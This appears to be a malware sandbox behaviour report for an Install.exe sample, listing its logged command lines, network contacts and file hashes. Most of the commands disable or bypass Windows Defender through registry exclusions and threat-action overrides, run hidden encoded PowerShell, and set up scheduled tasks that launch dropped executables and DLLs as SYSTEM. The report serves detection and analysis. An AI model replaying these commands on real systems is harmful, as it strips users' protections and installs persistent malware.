"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gxjPlCUcA" /SC once /ST 18:56:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gxjPlCUcA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gxjPlCUcA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe\" KP /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBhwtZQku" /SC once /ST 16:44:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBhwtZQku"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBhwtZQku"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 00:07:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\kbwbtR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HvGgydgoxkjNzSQ2" /F /xml "C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SuOhdtQTTGzWOe" /F /xml "C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wXhUETfkEDyNN2" /F /xml "C:\ProgramData\YVKeAuHUOaLCRzVB\IveybOc.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmBhVUxyoAiYAznxf2" /F /xml "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ESjeOYxIKdVsIzcFOuL2" /F /xml "C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLgAHCKDimrPMlxXg" /SC once /ST 12:44:21 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bLgAHCKDimrPMlxXg"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biFxKMwOTZzXEKwTU"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLgAHCKDimrPMlxXg"

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
N/A 224.0.0.251:5353 udp
FR 40.79.141.153:443 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
NL 65.9.86.11:80 addons.mozilla.org tcp
NL 65.9.86.11:443 addons.mozilla.org tcp
US 8.8.8.8:53 clients2.google.com udp
NL 142.250.179.174:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 52.41.252.216:80 api3.check-data.xyz tcp
US 93.184.221.240:80 tcp

Files

memory/4200-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe

